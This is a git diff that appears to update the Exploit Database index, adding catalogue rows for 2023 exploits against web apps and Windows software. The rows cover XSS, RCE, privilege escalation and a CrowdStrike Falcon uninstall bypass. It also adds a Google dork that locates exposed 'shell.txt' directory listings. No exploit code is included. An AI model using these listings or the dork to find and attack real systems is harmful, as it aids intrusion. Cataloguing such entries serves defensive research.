 13827,exploits/php/webapps/13827.txt,"Development Site Professional Liberal - Company Institutional SQL Injection",2010-06-11,"L0rd CrusAd3r",webapps,php,,2010-06-10,,1,,,,,,
+51145,exploits/php/webapps/51145.py,"Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)",2023-03-30,"Eric Flokstra",webapps,php,,2023-03-30,2023-03-30,0,CVE-2022-24632;CVE-2022-24630;CVE-2022-24629;CVE-2022-24627,,,,,
 4642,exploits/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,webapps,php,,2007-11-21,,1,OSVDB-38809;CVE-2007-6133,,,,,
 31112,exploits/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,webapps,php,,2008-02-04,2014-01-21,1,CVE-2008-7036;OSVDB-44334,,,,,https://www.securityfocus.com/bid/27619/info
 8545,exploits/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,webapps,php,,2009-04-26,,1,OSVDB-54422;CVE-2009-1624;OSVDB-54421;CVE-2009-1623,,,,,
@@ -17388,6 +17401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41037,exploits/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",webapps,php,,2017-01-12,2017-01-12,0,,,,,,
 38965,exploits/php/webapps/38965.txt,"ECommerceMajor - 'productdtl.php?prodid' SQL Injection",2015-12-14,"Rahul Pratap Singh",webapps,php,80,2015-12-14,2017-10-18,1,OSVDB-131782,,,,http://www.exploit-db.comecommerceMajor-master.zip,
 35878,exploits/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",webapps,php,,2015-01-26,2015-01-26,0,OSVDB-117570;OSVDB-117569;CVE-2015-1476,,,,,
+51140,exploits/php/webapps/51140.txt,"Ecommerse v1.0 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 12713,exploits/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,webapps,php,,2010-05-22,,1,,,,,,
 12702,exploits/php/webapps/12702.php,"ECShop - 'search.php' SQL Injection",2010-05-22,Jannock,webapps,php,,2010-05-21,,0,OSVDB-64854;CVE-2010-2042,,,,,
 8548,exploits/php/webapps/8548.txt,"ECShop 2.5.0 - 'order_sn' SQL Injection",2009-04-27,Securitylab.ir,webapps,php,,2009-04-26,,1,OSVDB-54423;CVE-2009-1622,,,,,
@@ -17753,6 +17767,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33602,exploits/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,webapps,php,,2010-02-05,2014-06-01,1,CVE-2010-0614;OSVDB-62177,,,,,https://www.securityfocus.com/bid/38116/info
 15169,exploits/php/webapps/15169.txt,"Evaria Content Management System 1.1 - File Disclosure",2010-10-01,"khayeye shotor",webapps,php,,2010-10-01,2010-10-01,1,OSVDB-68345,,,http://www.exploit-db.com/screenshots/idlt15500/15169.png,http://www.exploit-db.comevaria_ecms_v.1.1.zip,
 32057,exploits/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Multiple Remote File Inclusions",2008-07-16,ahmadbady,webapps,php,,2008-07-16,2014-03-05,1,,,,,,https://www.securityfocus.com/bid/30262/info
+51153,exploits/php/webapps/51153.txt,"Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)",2023-03-30,"@casp3r0x0 hassan ali al-khafaji",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 24748,exploits/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",webapps,php,,2004-11-16,2013-03-13,1,,,,,,https://www.securityfocus.com/bid/11693/info
 46115,exploits/php/webapps/46115.txt,"Event Calendar 3.7.4 - 'id' SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80,2019-01-10,2019-01-10,1,,"SQL Injection (SQLi)",,,,
 43279,exploits/php/webapps/43279.txt,"Event Calendar Category Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,,2017-12-10,2017-12-13,0,CVE-2017-17616,,,,,
@@ -23554,6 +23569,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22405,exploits/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,webapps,php,,2012-11-01,2012-11-01,0,OSVDB-86841,,,,http://www.exploit-db.comSuscriberUsers.zip,
 17962,exploits/php/webapps/17962.txt,"MyBB Forum Userbar Plugin (Userbar 2.2) - SQL Injection",2011-10-10,Mario_Vs,webapps,php,,2011-10-10,2011-10-13,1,CVE-2011-4569;OSVDB-77448,,,,,
 35266,exploits/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Persistent Cross-Site Scripting",2014-11-17,"Avinash Thapa",webapps,php,,2014-11-17,2014-11-22,1,,,,http://www.exploit-db.com/screenshots/idlt35500/screen-shot-2014-11-17-at-092854.png,,
+51136,exploits/php/webapps/51136.txt,"myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 38508,exploits/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,webapps,php,,2013-05-07,2015-10-22,1,,,,,,https://www.securityfocus.com/bid/59690/info
 49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",2021-01-29,0xB9,webapps,php,,2021-01-29,2021-01-29,0,CVE-2021-3337,,,,,
 23624,exploits/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,webapps,php,,2012-12-24,2012-12-26,1,OSVDB-88757,,,,http://www.exploit-db.comhmflags_1.1.zip,
@@ -33450,6 +33466,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
+51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
 7170,exploits/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing",2008-11-20,G4N0K,webapps,php,,2008-11-19,2017-01-06,1,OSVDB-50537;CVE-2008-5221,,,,http://www.exploit-db.comwPortfolio.zip,
@@ -39256,6 +39273,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30999,exploits/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 - Local Privilege Escalation",2008-01-07,"Ruben Santamarta",local,windows,,2008-01-07,2014-01-20,0,CVE-2008-7211;OSVDB-58127,,,,,https://www.securityfocus.com/bid/27179/info
 11828,exploits/windows/local/11828.py,"Crimson Editor r3.70 - Overwrite (SEH)",2010-03-21,mr_me,local,windows,,2010-03-20,,1,OSVDB-63089,,,,http://www.exploit-db.comcedt370r.exe,
 39510,exploits/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,local,windows,,2016-03-01,2017-07-19,0,,,,,http://www.exploit-db.comM3-soft-AC9-V3.1.2.0.exe,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5310.php
+51146,exploits/windows/local/51146.ps1,"CrowdStrike Falcon AGENT  6.44.15806  - Uninstall without Installation Token",2023-03-30,"Fortunato Lodari",local,windows,,2023-03-30,2023-03-30,0,CVE-2022-2841,,,,,
 19839,exploits/windows/local/19839.txt,"CRYPTOCard CRYPTOAdmin 4.1 - Weak Encryption (2)",2000-04-10,kingpin,local,windows,,2000-04-10,2012-07-15,1,CVE-2000-0275;OSVDB-10054,,,,,https://www.securityfocus.com/bid/1097/info
 4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",local,windows,,2007-07-25,,1,OSVDB-38689;CVE-2007-4032,,,,,
 18710,exploits/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,local,windows,,2012-04-06,2012-04-06,1,CVE-2012-0270;OSVDB-79491,"Metasploit Framework (MSF)",,,,
@@ -39854,6 +39872,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 19175,exploits/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,local,windows,,2012-06-17,2012-06-17,1,CVE-2012-2915;OSVDB-82001,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/48741
 47577,exploits/windows/local/47577.txt,"Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path",2019-11-04,"Gustavo Briseño",local,windows,,2019-11-04,2019-11-04,0,,,,,,
 47504,exploits/windows/local/47504.txt,"Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path",2019-10-16,"Luis MedinaL",local,windows,,2019-10-16,2019-10-16,0,,,,,,
+51143,exploits/windows/local/51143.txt,"Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path",2023-03-30,"P4p4 M4n3",local,windows,,2023-03-30,2023-03-30,0,,,,,,
 46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,,2019-04-25,2019-04-25,0,,Local,,,http://www.exploit-db.comlavavo-cd-ripper.exe,
 46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows,,2019-04-25,2019-04-25,0,,"Buffer Overflow",,,http://www.exploit-db.comlavavo-cd-ripper.exe,
 49066,exploits/windows/local/49066.txt,"LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path",2020-11-17,"Gerardo González",local,windows,,2020-11-17,2020-11-17,0,,,,,,
@@ -41305,6 +41324,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 14491,exploits/windows/local/14491.txt,"Zemana AntiLogger 'AntiLog32.sys' 1.5.2.755 - Local Privilege Escalation",2010-07-28,th_decoder,local,windows,,2010-07-28,2010-07-28,0,OSVDB-66762,,,,,
 40490,exploits/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,local,windows,,2016-10-10,2016-10-10,0,,,,,,http://hyp3rlinx.altervista.org/advisories/ZEND-STUDIO-PRIVILEGE-ESCALATION.txt
 47506,exploits/windows/local/47506.txt,"Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path",2019-10-16,cakes,local,windows,,2019-10-16,2019-10-16,0,,,,,http://www.exploit-db.comzrcs32.zip,
+51151,exploits/windows/local/51151.txt,"Zillya Total Security 3.0.2367.0  - Local Privilege Escalation",2023-03-30,"M. Akil Gündoğan",local,windows,,2023-03-30,2023-03-30,0,,,,,,
 17600,exploits/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 & h1ch4m",local,windows,,2011-08-03,2011-08-06,1,CVE-2004-0964;OSVDB-10416,,,http://www.exploit-db.com/screenshots/idlt18000/17600-1.png,http://www.exploit-db.comzinf-setup-2.2.1.exe,
 16688,exploits/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,local,windows,,2010-11-24,2011-04-26,1,CVE-2004-0964;OSVDB-10416,"Metasploit Framework (MSF)",,,http://www.exploit-db.comzinf-setup-2.2.1.exe,
 7888,exploits/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow",2009-01-28,Houssamix,local,windows,,2009-01-27,2011-04-26,1,CVE-2004-0964;OSVDB-10416,,,,http://www.exploit-db.comzinf-setup-2.2.1.exe,
diff --git a/ghdb.xml b/ghdb.xml
index 8e2f00043..4b3d56a23 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -40384,6 +40384,21 @@ Category: Files Containing Juicy Info
   <date>2022-09-19</date>
   <author>HackerFrenzy</author>
  </entry>
+ <entry>
+  <id>8132</id>
+  <link>https://www.exploit-db.com/ghdb/8132</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of &quot; &quot;shell.txt&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;index of &quot; &quot;shell.txt&quot;
+# Files Containing Juicy Info
+# Date:30/03/2023
+# Exploit Author: Delowar Hossain</textualDescription>
+  <query>intitle:&quot;index of &quot; &quot;shell.txt&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;index of &quot; &quot;shell.txt&quot;</querystring>
+  <edb></edb>
+  <date>2023-03-30</date>
+  <author>Delowar Hossain</author>
+ </entry>
  <entry>
   <id>6087</id>
   <link>https://www.exploit-db.com/ghdb/6087</link>